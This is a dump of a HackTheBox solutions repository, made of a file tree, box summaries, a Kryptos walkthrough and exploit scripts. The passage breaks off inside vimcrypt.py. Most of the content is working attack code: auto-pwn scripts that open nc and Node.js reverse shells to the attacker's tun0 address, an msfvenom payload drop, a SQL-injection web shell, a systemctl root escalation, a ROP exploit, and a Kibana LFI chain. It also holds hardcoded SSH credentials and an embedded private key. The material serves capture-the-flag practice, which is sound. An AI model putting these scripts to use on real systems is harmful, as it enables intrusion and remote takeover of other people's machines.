├── Boxes ├── AI │ ├── AI.pdf │ └── README.md ├── Bastion │ └── README.md ├── Chainsaw │ └── autopwn.py ├── Chaos │ └── README.md ├── Ellingson │ ├── README.md │ └── rop.py ├── Friendzone │ └── README.md ├── Ghoul │ └── README.md ├── Haystack │ ├── README.md │ └── autopwn.py ├── Jarvis │ └── autopwn.py ├── Kryptos │ ├── README.md │ ├── kryptos.py │ ├── root-exploit.py │ ├── seed.py │ ├── server.py │ └── vimcrypt.py ├── Networked │ ├── README.md │ └── autopwn.py ├── Onetwoseven │ └── README.md ├── Player │ ├── Player.pdf │ └── README.md ├── README.md ├── Safe │ ├── README.md │ └── rop.py ├── Sizzle │ └── README.md └── Writeup │ └── README.md ├── Enumeration ├── .gitkeep ├── README.md └── wakeup.py ├── File Inclusion ├── README.md ├── action.png ├── fmf.py └── usage.png └── README.md /Boxes/AI/AI.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrR3boot/HackTheBox/87c2a87d584c93851dc1d8f5e61d895001a22214/Boxes/AI/AI.pdf -------------------------------------------------------------------------------- /Boxes/AI/README.md: -------------------------------------------------------------------------------- 1 | I really loved this https://www.youtube.com/watch?v=KwzxojwpPqI and designed `AI` with similar concept. 2 | -------------------------------------------------------------------------------- /Boxes/Bastion/README.md: -------------------------------------------------------------------------------- 1 | Simple windows machine involves mounting vhd files and taking user along the way. Privilege escalation is fun with mRemoteng software abuse. 2 | 3 | I've created a walkthrough in Youtube. Here's the link. https://www.youtube.com/watch?v=wVeYuyxkWUg&t=1s 4 | -------------------------------------------------------------------------------- /Boxes/Chainsaw/autopwn.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import json 4 | import pexpect 5 | import random 6 | from web3 import Web3 7 | from pwn import * 8 | import subprocess 9 | from time import sleep 10 | import netifaces as ni 11 | from ftplib import FTP 12 | from base64 import b64decode 13 | 14 | ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] 15 | 16 | def shell(user): 17 | if user == 'administrator': 18 | log.info('Downloading files from FTP server') 19 | ftp = FTP('10.10.10.142') 20 | ftp.login('anonymous','wow') 21 | files = ftp.nlst() 22 | for file in files: 23 | ftp.retrbinary("RETR " + file ,open(file, 'wb').write) 24 | p = subprocess.Popen(['which','jq'],stdout=subprocess.PIPE,stderr=subprocess.PIPE) 25 | stdout,stderr = p.communicate() 26 | p = subprocess.Popen(['cat WeaponizedPing.json | jq .abi'],shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE) 27 | stdout,stderr = p.communicate() 28 | log.info('Loading abi from WeaponizedPing.json') 29 | abi = json.loads(stdout) 30 | web3 = Web3(Web3.HTTPProvider('http://10.10.10.142:9810')) 31 | web3.eth.defaultAccount = web3.eth.accounts[0] 32 | address = open('address.txt','r').read().strip() 33 | contract = web3.eth.contract(address=address,abi=abi) 34 | log.info('Initiating the Transaction') 35 | port = random.randint(0,65535) 36 | l = listen(port) 37 | log.info('Triggering shell') 38 | contract.functions.setDomain('{};rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {}>/tmp/f'.format(ip,ip,port)).transact() 39 | c = l.wait_for_connection() 40 | c.sendline('''/usr/bin/python -c 'import pty;pty.spawn("/bin/bash")' ''') 41 | c.interactive() 42 | else: 43 | key='''LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQcm9jLVR5cGU6IDQsRU5DUllQVEVECkRFSy1JbmZvOiBERVMtRURFMy1DQkMsNTNEODgxRjI5OUJBODUwMwoKU2VDTll3L0JzWFB5UXExSFJMRUVLaGlOSVZmdFphZ3pPY2M2NGZmMUlwSm85SWVHN1ovemordjFkQ0lkZWp1awo3a3RRRmN6VGx0dG5ySWo2bWRCYjZybk42Q3NQMHZiejlOelJCeWcxbzZjU0dkckwyRW1KTi9lU3hENEFXTGN6Cm4zMkZQWTBWamxJVnJoNHJqaFJlMndQTm9nQWNpQ0htWkdFQjB0Z3YyL2V5eEU2M1ZjUnpyeEpDWWwraHZTWjYKZnZzU1g4QTRRcjdyYmY5Zm56NFBJbUlndXJGM1ZoUW1kbEVtekRSVDRtL3BxZjNUbUdBazkrd3JpcW5rT0RGUQpJKzJJMWNQYjhKUmhMU3ozcHlCM1gvdUdPVG5ZcDRhRXErQVFaMnZFSnozRmZYOVNYOWs3ZGQ2S2FadFNBenFpCnc5ODFFUzg1RGs5TlVvOHVMeG5aQXczc0Y3UHo0RXVKMEhwbzFlWmdZdEt6dkRLcnJ3OHVvNFJDYWR4N0tIUlQKaW5LWGR1SHpuR0ExUVJPelpXN3hFM0hFTDN2eFI5Z01WOGdKUkhEWkRNSTl4bHc5OVFWd2N4UGNGYTMxQXpWMgp5cDNxN3lsOTU0U0NNT3RpNFJDM1o0eVVUakRrSGRIUW9FY0dpZUZPV1UraTFvaWo0Y3J4MUxiTzJMdDhuSEs2CkcxQ2NxN2lPb240UnNUUmxWcnY4bGlJR3J4bmhPWTI5NWU5ZHJsN0JYUHBKcmJ3c284eHhIbFQzMzMzWVU5ZGoKaFFMTnA1KzJINCtpNm1tVTN0Mm9nVG9QNHNrVmNvcURsQ0MrajZoRE9sNGJwRDl0NlRJSnVyV3htcEdnTnhlcwpxOE5zQWVudGJzRCt4bDRXNnE1bXVMSlFtai94UXJySGFjRVpER0k4a1d2WkUxaUZtVmtEL3hCUm53b0daNWh0CkR5aWxMUHBsOVIrRGg3YnkzbFBtOGtmOHRRbkhzcXBSSGNleUJGRnBucTBBVWRFS2ttMUxSTUxBUFlJTGJsS0cKandyQ3FSdkJLUk1JbDZ0SmlEODdOTTZKQm9ReWRPRWNwbis2RFUrMkFjdGVqYnVyMGFNNzRJeWVlbnJHS1NTWgpJWk1zZDJrVFNHVXh5OW8veFBLRGtVdy9TRlV5U21td2lxaUZMNlBhRGd4V1F3SHh0eHZtSE1oTDZjaXROZEl3ClRjT1RTSmN6bVIycEp4a29oTHJIN1lyUzJhbEtzTTBGcEZ3bWR6MS9YRFNGMkQ3aWJmL1cxbUF4TDVVbUVxTzAKaFVJdVcxZFJGd0hqTnZhb1NrK2ZyQXA2aWM2SVBZU21kbzhHWVl5OHBYdmNxd2ZScHhZbEFDWnU0RmlpNmhZaQo0V3BoVDNaRllEcnc3U3RnSzA0a2JEN1FrUGVOcTlFdjFJbjJuVmR6RkhQSWg2eitmbXBiZ2ZXZ2VsTEhjMmV0ClNKWTQrNUNFYmtBY1lFVW5QV1k5U1BPSjdxZVU3K2IvZXF6aEtia3BuYmxtaUsxZjNyZU9NMllVS3k4YWFsZWgKbkpZbWttcjN0M3FHUnpoQUVUY2tjOEhMRTExZEdFK2w0YmE2V0JOdTE1R29FV0Fzenp0TXVJVjFlbW50OTdvTQpJbW5mb250T1lkd0I2LzJvQ3V5SlRpZjhWdy9XdFdxWk5icGV5OTcwNGE5bWFwLytiRHFlUVE0MStCOEFDRGJLCldvdnNneVdpL1VwaU1UNm02clgrRlA1RDVFOHpyWXRubm1xSW83dnhIcXRCV1V4amFoQ2RuQnJrWUZ6bDZLV1IKZ0Z6eDNlVGF0bFpXeXI0a3N2Rm10b2JZa1pWQVFQQUJXeitnSHB1S2xycWhDOUFOenIvSm4rNVpmRzAybW9GLwplZEwxYnA5SFBSSTQ3RHl2THd6VDEvNUw5Wno2WSsxTXplbmRUaTNLcnpRL1ljZnI1WUFSdll5TUxiTGpNRXRQClV2SmlZNDB1Mm5tVmI2UXFwaXkyenIvYU1saHB1cFpQay94dDhvS2hLQytsOW1nT1RzQVhZakNiVG1MWHpWclgKMTVVMjEwQmR4RUZVRGNpeE5pd1Rwb0JTNk1meENPWndOLzFadjBtRThFQ0krNDRMY3FWdDN3PT0KLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0=''' 44 | subprocess.Popen(['echo -n {} | base64 -d > bobby.key'.format(key)],shell=True) 45 | subprocess.Popen(['chmod 400 bobby.key'],shell=True) 46 | p = pexpect.spawn("ssh -i bobby.key bobby@10.10.10.142") 47 | p.expect(':') 48 | p.sendline('jackychain') 49 | if user == 'bobby': 50 | p.interact() 51 | else: 52 | p.sendline(''' echo '#!/bin/sh'>sudo ''') 53 | p.sendline(''' echo '/bin/sh' >> sudo ''') 54 | p.sendline('chmod +x sudo') 55 | p.sendline('export PATH=.:$PATH') 56 | p.sendline('/home/bobby/projects/ChainsawClub/ChainsawClub') 57 | p.sendline(''' /usr/bin/python -c 'import pty;pty.spawn("/bin/bash")' ''') 58 | p.interact() 59 | 60 | if __name__=="__main__": 61 | print(''' 62 | .-----. 63 | /::::::|^^^^^^^^^^^^^^^^^^^^^^^^^. 64 | |():::::| . . . . . . . . .} 65 | \::::::| .' 66 | '-----'^^^^^^^^^^^^^^^^^^^^^^^^^ 67 | Let's Chop This Box Down.. 68 | by MrR3boot''') 69 | print('1. administrator') 70 | print('2. bobby') 71 | print('3. root') 72 | input = input('> ').strip() 73 | if input == '1': 74 | shell('administrator') 75 | elif input == '2': 76 | shell('bobby') 77 | else: 78 | shell('root') 79 | -------------------------------------------------------------------------------- /Boxes/Chaos/README.md: -------------------------------------------------------------------------------- 1 | Medium level box which shows pretty CTFish steps to get the user and interesting stored passwords in mozilla files to get the root. 2 | 3 | https://www.youtube.com/watch?v=1g6r7dyAwD4 4 | -------------------------------------------------------------------------------- /Boxes/Ellingson/README.md: -------------------------------------------------------------------------------- 1 | Hard machine which involves exploiting Werkzeug debugger console enabled on web application and further privilege escalation by exploiting the binary. 2 | 3 | https://www.youtube.com/watch?v=ju6f_4ghzo0&t=2409s 4 | -------------------------------------------------------------------------------- /Boxes/Ellingson/rop.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import sys 3 | 4 | #p = process("/root/Desktop/htb/boxes/ellingson/garbage") 5 | remoteshell = ssh('margo','10.10.10.139',22,'iamgod$08') 6 | p = remoteshell.process("/usr/bin/garbage") 7 | 8 | #0x000000000040179b : pop rdi ; ret 9 | pop_rdi = p64(0x40179b) 10 | got_plt = p64(0x404028) 11 | put_plt = p64(0x401050) 12 | main = p64(0x401619) 13 | 14 | #Stage 1: Leak 15 | payload = "A"*136 + pop_rdi + got_plt + put_plt + main 16 | p.sendline(payload) 17 | temp = p.recvuntil('\x7f') 18 | temp = temp.split('\n')[2] 19 | leakedputs = u64(temp+'\x00\x00') 20 | print '[+] leakedputs : {}'.format(leakedputs) 21 | 22 | #Stage 2: finding offsets 23 | #libc = 0x71910 24 | libc = 0x809c0 25 | libc_addr = leakedputs - libc 26 | print '[+] libc@glibc : {}'.format(libc_addr) 27 | #system = p64(0x449c0 + libc_addr) 28 | system = p64(libc_addr + 0x4f440) 29 | #sh = p64(0x181519 + libc_addr) 30 | sh = p64(libc_addr + 0x1b3e9a) 31 | #stage 3: setuid 32 | #setuid=p64(libc_addr + 0xc7500) 33 | setuid = p64(libc_addr + 0xe5970) 34 | auth = p64(0x401513) 35 | payload = "A"*136 + pop_rdi + p64(0x0)+ setuid + auth 36 | p.sendline(payload) 37 | 38 | #Stage 4: popping shell 39 | #payload = "A"*136 + pop_rdi + sh + system 40 | payload = "A"*136 + p64(0x4f2c5+libc_addr) 41 | p.sendline(payload) 42 | p.interactive() 43 | -------------------------------------------------------------------------------- /Boxes/Friendzone/README.md: -------------------------------------------------------------------------------- 1 | Easy machine which includes LFI and SMB enumeration way to user and python library overwrite to root 2 | 3 | https://www.youtube.com/watch?v=UFuDfaXId9U&t=10s 4 | -------------------------------------------------------------------------------- /Boxes/Ghoul/README.md: -------------------------------------------------------------------------------- 1 | Insane creation from MinatoTW and egre55. I loved every step of vulnerability which they choosen. I've recorded the walkthrough and here's the link 2 | 3 | https://www.youtube.com/watch?v=Svvo76oaAPs 4 | -------------------------------------------------------------------------------- /Boxes/Haystack/README.md: -------------------------------------------------------------------------------- 1 | Super cool box involving Elastic Search, Kibana and Logstash techniques to get the root shell. 2 | 3 | https://youtu.be/92TSKD81L7Y 4 | -------------------------------------------------------------------------------- /Boxes/Haystack/autopwn.py: -------------------------------------------------------------------------------- 1 | import re 2 | import urllib 3 | import base64 4 | import subprocess 5 | from pwn import * 6 | from time import sleep 7 | import netifaces as ni 8 | from threading import Thread 9 | 10 | ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] 11 | 12 | def shell(user): 13 | if user == "security": 14 | p = ssh(host='10.10.10.115',user='security',password='spanish.is.key') 15 | p = p.process("/bin/bash") 16 | p.interactive() 17 | else: 18 | p = ssh(host='10.10.10.115',user='security',password='spanish.is.key') 19 | p = p.process("/bin/bash") 20 | payload = """ (function(){\r\n var net = require(\\"net\\"),\r\n cp = require(\\"child_process\\"),\r\n sh = cp.spawn(\\"/bin/sh\\", []);\r\n var client = new net.Socket();\r\n client.connect(1337, \\"ipaddress\\", function(){\r\n client.pipe(sh.stdin);\r\n sh.stdout.pipe(client);\r\n sh.stderr.pipe(client);\r\n });\r\n return /a/;\r\n})();""" 21 | payload = re.sub('ipaddress',"{}".format(ip),payload) 22 | p.sendline(' python -c "open(\'/tmp/new.js\',\'wb\').write(\'\'\'{}\'\'\')"'.format(payload)) 23 | log.info('Sending payload') 24 | l = listen('1337') 25 | log.info('Sending payload') 26 | p.sendline('curl "http://127.0.0.1:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../tmp/new.js"&') 27 | log.info('payload sent') 28 | c = l.wait_for_connection() 29 | if user == "kibana": 30 | log.info('Popping Kibana Shell') 31 | c.interactive() 32 | else: 33 | log.info('Writing reverse shell') 34 | q = subprocess.Popen(['/usr/bin/msfvenom','-p','linux/x64/shell_reverse_tcp','LHOST={}'.format(ip),'LPORT=1234','-f','elf'],stdout=subprocess.PIPE,stderr=subprocess.PIPE) 35 | stdout,stderr = q.communicate() 36 | c.sendline(''' echo '{}' > /tmp/1 '''.format(base64.b64encode(stdout))) 37 | c.sendline('cat /tmp/1 | base64 -d > /tmp/shell') 38 | c.sendline('chmod +x /tmp/shell') 39 | log.info('Writing grok pattern') 40 | c.sendline('echo "Ejecutar comando : /tmp/shell">/opt/kibana/logstash_1337') 41 | c.sendline('chmod +x /opt/kibana/logstash_1337') 42 | m = listen('1234').wait_for_connection() 43 | log.info('Popping root shell') 44 | m.interactive() 45 | if __name__=="__main__": 46 | print ''' _ _ _ _ ___ _ _ 47 | | || | __ _ | || | / __| | |_ __ _ __ | |__ 48 | | __ | / _` | \_, | \__ \ | _| / _` | / _| | / / 49 | |_||_| \__,_| _|__/ |___/ _\__| \__,_| \__|_ |_\_\ 50 | _|"""""|_|"""""|_| """"|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 51 | "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 52 | By MrR3boot\n''' 53 | print 'Choose an option :)' 54 | print '1. security' 55 | print '2. kibana' 56 | print '3. root' 57 | input = raw_input('> ').strip() 58 | if input == '1': 59 | shell('security') 60 | elif input == '2': 61 | shell('kibana') 62 | else: 63 | shell('root') 64 | -------------------------------------------------------------------------------- /Boxes/Jarvis/autopwn.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import os 3 | import sys 4 | import requests 5 | import random 6 | from pwn import * 7 | import netifaces as ni 8 | from threading import Thread 9 | 10 | ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] 11 | url = 'http://10.10.10.143' 12 | r = requests.get(url) 13 | cookie = r.headers['Set-Cookie'].split(';')[0].split('=')[1] 14 | cookie = dict(PHPSESSID=cookie) 15 | fname = random.randint(1,100001) 16 | 17 | def limited(): 18 | payload = '''room.php?cod=-2 union select 1,2,3,'',5,6,7 into outfile '/var/www/html/{}.php' '''.format(ip,str(fname)) 19 | r = requests.get(url+'/'+payload, cookies=cookie) 20 | log.info('Got the www-data shell') 21 | r = requests.get(url+'/'+str(fname)+'.php') 22 | 23 | def listener(interactive,port): 24 | if interactive=='payload': 25 | l=listen(port) 26 | c = l.wait_for_connection() 27 | log.info('Escalating....') 28 | l.sendline('echo "nc -e /bin/sh {} 123" > /tmp/{}.sh'.format(ip,str(fname))) 29 | l.sendline('sudo -u pepper /var/www/Admin-Utilities/simpler.py -p') 30 | l.recvuntil("Enter an IP:") 31 | log.info('Got the pepper shell') 32 | l.sendline("$(/bin/sh /tmp/{}.sh)".format(str(fname))) 33 | elif interactive=='root': 34 | l = listen(port) 35 | c = l.wait_for_connection() 36 | log.info('Found setuid binary : /bin/systemctl') 37 | log.info('Generating SSH Keys') 38 | os.system('yes y | ssh-keygen -t rsa -b 4096 -C "email@email.com" -m PEM -N "" -f /root/.ssh/id_rsa') 39 | log.info('Writing to authorized_keys') 40 | with open('/root/.ssh/id_rsa.pub') as f: 41 | content = f.read() 42 | f.close() 43 | l.sendline('mkdir /home/pepper/.ssh') 44 | l.sendline('chmod 700 /home/pepper/.ssh') 45 | print content.strip() 46 | l.sendline('echo "{}" > /home/pepper/.ssh/authorized_keys'.format(content.strip())) 47 | l.close() 48 | p = ssh(host='10.10.10.143',user='pepper',keyfile='/root/.ssh/id_rsa') 49 | s = p.process("/bin/sh") 50 | s.sendline('cd /tmp') 51 | s.sendline('TF=$(mktemp).service') 52 | payload=""" 53 | echo '[Service] 54 | Type=oneshot 55 | ExecStart=/bin/sh -c "/bin/nc -e /bin/sh {} 1337" 56 | [Install] 57 | WantedBy=multi-user.target' > $TF """.format(ip) 58 | s.sendline(payload) 59 | s.sendline('/bin/systemctl link $TF') 60 | s.sendline('/bin/systemctl enable --now $TF') 61 | else: 62 | l = listen(port) 63 | c = l.wait_for_connection() 64 | l.sendline('id') 65 | l.sendline('''python -c 'import pty;pty.spawn("/bin/bash")' ''') 66 | l.interactive() 67 | 68 | if __name__=="__main__": 69 | print '''\033[01m\033[93m 70 | _ _ 71 | _ | | __ _ _ _ __ __ (_) ___ 72 | | || | / _` | | '_| \ V / | | (_-< 73 | _\__/ \__,_| _|_|_ _\_/_ _|_|_ /__/_ 74 | _|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 75 | "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 76 | \033[01m\033[34mBy MrR3boot''' 77 | 78 | print "\033[01m\033[91mLet's Grab the shells" 79 | print "\033[92m1. www-data" 80 | print "2. pepper" 81 | print "3. root" 82 | input = input("\033[95m> ") 83 | if input == 1: 84 | t1 = Thread(target=limited) 85 | log.info('[+] Creating Listener') 86 | t2 = Thread(target=listener,args=('interactive','1234',)) 87 | t2.start() 88 | log.info('[+] Exploiting SQLi') 89 | t1.start() 90 | elif input == 2: 91 | t1 = Thread(target=limited) 92 | t2 = Thread(target=listener,args=('payload','1234',)) 93 | t3 = Thread(target=listener,args=('interactive','123',)) 94 | t2.start() 95 | t1.start() 96 | t3.start() 97 | elif input == 3: 98 | t1 = Thread(target=limited) 99 | t2 = Thread(target=listener,args=('payload','1234',)) 100 | t3 = Thread(target=listener,args=('root','123',)) 101 | t4 = Thread(target=listener,args=('interactive','1337',)) 102 | t2.start() 103 | t1.start() 104 | t4.start() 105 | t3.start() 106 | else: 107 | sys.exit(0) 108 | -------------------------------------------------------------------------------- /Boxes/Kryptos/README.md: -------------------------------------------------------------------------------- 1 | # Kryptos: 2 | 3 | ## Description: 4 | A very hard and awesome machine which involves several cryptography concepts where i'm mostly interested in. 5 | 6 | ## Walkthrough: 7 | ### User: 8 | 1. Simple Web login which has hidden ``db`` param and by poking it with certain special characters i ended up in finding a ``PDO Exception`` with ``;`` character. 9 | 2. Which shows that i can redirect target server to authenticate to my own MySQL server and can bypass authentication by creating same table and with any username/password combo. 10 | 3. We welcomed with a page which fetches remote url content and encrypts with ``AES-CBC or RC4``. 11 | 4. As we know ``RC4`` is a Stream Cipher with known vulnerabilities. So i've choosen it for fetching local files. 12 | 13 | > As an example i've sent my local ip to fetch ``A sample text`` and it does returned with encrypted content. 14 | 15 | > ``A (A Sample Text) XOR B (Key on server) = C (Cipher Text)``. 16 | 17 | > To get plaintext back we can simply send Cipher Text (C) to server which does XOR with Key (B) and can give plaintext (A) back to us. 18 | 19 | 5. Using this solution i've started fetching ``dev`` folder default file ``index.php`` content. 20 | 6. It does have ``?page=`` which immediately triggers a Local File Inclusion vulnerability. So using a php wrapper i've read ``todo`` page source which told about ``sqlitestpage`` reading its source i've identified a SQL injection writing/reading files from the server. I've automated all of above steps in [kryptos.py](https://github.com/MrR3boot/HackTheBox/blob/master/Boxes/Kryptos/kryptos.py). 21 | 7. I could see old credentials and new ``creds.txt`` on user home folder. But new credentials are encrypted with VimCrypt which uses blowfish algorigthm. It has known weakness with which we can perform ``Known Plaintext Attack`` [https://dgl.cx/2014/10/vim-blowfish]. 22 | 8. Using the script [vimcrypt.py](https://github.com/MrR3boot/HackTheBox/blob/master/Boxes/Kryptos/vimcrypt.py) i've decrypted the credentials and SSHed in. 23 | 24 | ### Root: 25 | 1. On user home i've found [server.py](https://github.com/MrR3boot/HackTheBox/blob/master/Boxes/Kryptos/server.py) and by just looking at ``eval`` usage i figured out there is a way to execute our code on server as root. 26 | 2. It seems that there is signature validation against the expression that is being evaluated. But the problem is when we generate seeds they do repeat after several iterations which seems to be an issue. So i've generated seeds and kept it on file using [seed.py](https://github.com/MrR3boot/HackTheBox/blob/master/Boxes/Kryptos/seed.py). 27 | 3. Crafted a script to create signatures using generated seeds and bruteforce the server with sample expression ``3+3`` [root-exploit.py](https://github.com/MrR3boot/HackTheBox/blob/master/Boxes/Kryptos/root-exploit.py) 28 | 4. After several iterations i do see success message with evaluated expression. Then using known python sandbox bypasses i've crafted a working payload to read root.txt 29 | 30 | ## References: 31 | 1. https://crypto.stackexchange.com/questions/45021/rc4-finding-key-if-we-know-plain-text-and-ciphertext 32 | 2. https://dgl.cx/2014/10/vim-blowfish 33 | 3. https://romailler.ch/2017/11/17/ynot17-sms/ 34 | 4. https://wapiflapi.github.io/2013/04/22/plaidctf-pyjail-story-of-pythons-escape 35 | -------------------------------------------------------------------------------- /Boxes/Kryptos/kryptos.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | import random 4 | from bs4 import BeautifulSoup 5 | from time import sleep 6 | import netifaces as ni 7 | from base64 import b64decode 8 | 9 | url = 'http://10.10.10.129' 10 | ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] 11 | r = requests.get(url) 12 | cookie = r.headers['Set-Cookie'].split(';')[0].split('=')[1] 13 | token = BeautifulSoup(r.text,'lxml') 14 | token = token.find('input',{'name':'token'})['value'] 15 | 16 | def req(): 17 | payload = raw_input('File> ') 18 | payload = '''http://127.0.0.1/dev/index.php?view=php://filter/convert.base64-encode/resource={}'''.format(payload) 19 | dump(payload) 20 | 21 | def dump(payload): 22 | r = requests.post(url,data={'username':'admin','password':'admin','db':'cryptor;host={}'.format(ip),'token':token,'login':' '}, cookies={'PHPSESSID':cookie}, proxies={'http':'http://127.0.0.1:8080'}) 23 | r = requests.get(url+'/encrypt.php?cipher=RC4&url={}'.format(payload),cookies={'PHPSESSID':cookie},proxies={'http':'http://127.0.0.1:8080'}) 24 | msg = BeautifulSoup(r.text,'lxml') 25 | msg = msg.find('textarea',{'name':'textarea'}).text 26 | msg = b64decode(msg) 27 | with open('output.txt','w') as f: 28 | f.write(msg) 29 | f.close() 30 | r = requests.get(url+'/encrypt.php?cipher=RC4&url=http://{}/output.txt'.format(ip),cookies={'PHPSESSID':cookie},proxies={'http':'http://127.0.0.1:8080'}) 31 | msg = BeautifulSoup(r.text,'lxml') 32 | msg = msg.find('textarea',{'name':'textarea'}).text 33 | msg = b64decode(msg) 34 | out = BeautifulSoup(msg,'lxml') 35 | if out.find('div'): 36 | out = out.find('div') 37 | out = out.next_sibling 38 | print b64decode(out) 39 | else: 40 | print msg 41 | 42 | def file(): 43 | payload = raw_input('Filename: ') 44 | file = random.randint(1,10000) 45 | # payload = urllib.quote_plus('''attach database 'd9e28afcf0b274a5e0542abb67db0784/{}.php' as test;create table test.testing(data text);insert into test.testing values('');-- '''.format(file,payload)) 46 | payload = urllib.quote_plus('''attach database 'd9e28afcf0b274a5e0542abb67db0784/{}.php' as test;create table test.testing(data text);insert into test.testing values('');-- '''.format(file,payload)) 47 | payload = urllib.quote_plus('''http://127.0.0.1/dev/sqlite_test_page.php?no_results=1&bookid=1;{}'''.format(payload)) 48 | print payload 49 | dump(payload) 50 | sleep(4) 51 | payload = '''http://127.0.0.1/dev/d9e28afcf0b274a5e0542abb67db0784/{}.php'''.format(file) 52 | dump(payload) 53 | 54 | def dir(): 55 | payload = raw_input('Dir: ') 56 | file = random.randint(1,10000) 57 | payload = urllib.quote_plus('''attach database 'd9e28afcf0b274a5e0542abb67db0784/{}.php' as test;create table test.testing(data text);insert into test.testing values('');-- '''.format(file,payload)) 58 | payload = urllib.quote_plus('''http://127.0.0.1/dev/sqlite_test_page.php?no_results=1&bookid=1;{}'''.format(payload)) 59 | print payload 60 | dump(payload) 61 | sleep(4) 62 | payload = '''http://127.0.0.1/dev/d9e28afcf0b274a5e0542abb67db0784/{}.php'''.format(file) 63 | dump(payload) 64 | 65 | 66 | 67 | if __name__=="__main__": 68 | print "Kryptos..." 69 | print "1. View Source" 70 | print "2. File access" 71 | print "3. Dir" 72 | input = raw_input('> ').strip() 73 | if input == "1": 74 | req() 75 | elif input == "2": 76 | file() 77 | else: 78 | dir() 79 | -------------------------------------------------------------------------------- /Boxes/Kryptos/root-exploit.py: -------------------------------------------------------------------------------- 1 | import random 2 | import json 3 | import hashlib 4 | import binascii 5 | import requests 6 | from ecdsa import VerifyingKey, SigningKey, NIST384p 7 | 8 | 9 | url = 'http://127.0.0.1:81/eval' 10 | 11 | with open('out.txt','r') as f: 12 | for i,line in enumerate(f,start=1): 13 | try: 14 | line = line.replace('\n','') 15 | line = int(line)+1 16 | expr = '''3+3''' 17 | sk = SigningKey.from_secret_exponent(line, curve=NIST384p) 18 | sign = binascii.hexlify(sk.sign(str.encode(expr))) 19 | data = {'expr':expr,'sig':str.decode(sign)} 20 | headers = {'Content-Type': 'application/json'} 21 | r = requests.post(url,data=json.dumps(data),headers=headers) 22 | if not 'Bad signature' in r.text: 23 | print "Sign : {}".format(sign) 24 | print r.text 25 | break 26 | else: 27 | print '{} retrying..'.format(i) 28 | print r.text 29 | continue 30 | except: 31 | print 'int error' 32 | continue 33 | -------------------------------------------------------------------------------- /Boxes/Kryptos/seed.py: -------------------------------------------------------------------------------- 1 | import random 2 | import json 3 | import hashlib 4 | import binascii 5 | from ecdsa import VerifyingKey, SigningKey, NIST384p 6 | from bottle import route, run, request, debug 7 | from bottle import hook 8 | from bottle import response as resp 9 | 10 | 11 | def secure_rng(seed): 12 | # Taken from the internet - probably secure 13 | p = 2147483647 14 | g = 2255412 15 | 16 | keyLength = 32 17 | ret = 0 18 | ths = round((p-1)/2) 19 | for i in range(keyLength*8): 20 | seed = pow(g,seed,p) 21 | if seed > ths: 22 | ret += 2**i 23 | return ret 24 | 25 | # Set up the keys 26 | with open('out.txt','a') as f: 27 | for _ in range(20000): 28 | seed = random.getrandbits(128) 29 | rand = secure_rng(seed) 30 | f.write(str(rand)+'\n') 31 | f.close() 32 | -------------------------------------------------------------------------------- /Boxes/Kryptos/server.py: -------------------------------------------------------------------------------- 1 | import random 2 | import json 3 | import hashlib 4 | import binascii 5 | from ecdsa import VerifyingKey, SigningKey, NIST384p 6 | from bottle import route, run, request, debug 7 | from bottle import hook 8 | from bottle import response as resp 9 | 10 | 11 | def secure_rng(seed): 12 | # Taken from the internet - probably secure 13 | p = 2147483647 14 | g = 2255412 15 | 16 | keyLength = 32 17 | ret = 0 18 | ths = round((p-1)/2) 19 | for i in range(keyLength*8): 20 | seed = pow(g,seed,p) 21 | if seed > ths: 22 | ret += 2**i 23 | return ret 24 | 25 | # Set up the keys 26 | seed = random.getrandbits(128) 27 | rand = secure_rng(seed) + 1 28 | sk = SigningKey.from_secret_exponent(rand, curve=NIST384p) 29 | vk = sk.get_verifying_key() 30 | 31 | def verify(msg, sig): 32 | try: 33 | return vk.verify(binascii.unhexlify(sig), msg) 34 | except: 35 | return False 36 | 37 | def sign(msg): 38 | return binascii.hexlify(sk.sign(msg)) 39 | 40 | @route('/', method='GET') 41 | def web_root(): 42 | response = {'response': 43 | { 44 | 'Application': 'Kryptos Test Web Server', 45 | 'Status': 'running' 46 | } 47 | } 48 | return json.dumps(response, sort_keys=True, indent=2) 49 | 50 | @route('/eval', method='POST') 51 | def evaluate(): 52 | try: 53 | req_data = request.json 54 | expr = req_data['expr'] 55 | sig = req_data['sig'] 56 | # Only signed expressions will be evaluated 57 | if not verify(str.encode(expr), str.encode(sig)): 58 | return "Bad signature" 59 | result = eval(expr, {'__builtins__':None}) # Builtins are removed, this should be pretty safe 60 | response = {'response': 61 | { 62 | 'Expression': expr, 63 | 'Result': str(result) 64 | } 65 | } 66 | return json.dumps(response, sort_keys=True, indent=2) 67 | except: 68 | return "Error" 69 | 70 | # Generate a sample expression and signature for debugging purposes 71 | @route('/debug', method='GET') 72 | def debug(): 73 | expr = '2+2' 74 | sig = sign(str.encode(expr)) 75 | response = {'response': 76 | { 77 | 'Expression': expr, 78 | 'Signature': sig.decode() 79 | } 80 | } 81 | return json.dumps(response, sort_keys=True, indent=2) 82 | 83 | run(host='127.0.0.1', port=81, reloader=True) 84 | -------------------------------------------------------------------------------- /Boxes/Kryptos/vimcrypt.py: -------------------------------------------------------------------------------- 1 | with open('creds.txt','rb') as f: 2 | f.seek(28) 3 | a = bytearray('rijndael') 4 | b = bytearray(f.read(8)) 5 | c = bytearray(len(a)) 6 | for i in range(len(a)): 7 | c[i] = a[i] ^ b[i] 8 | #1st block 9 | a = 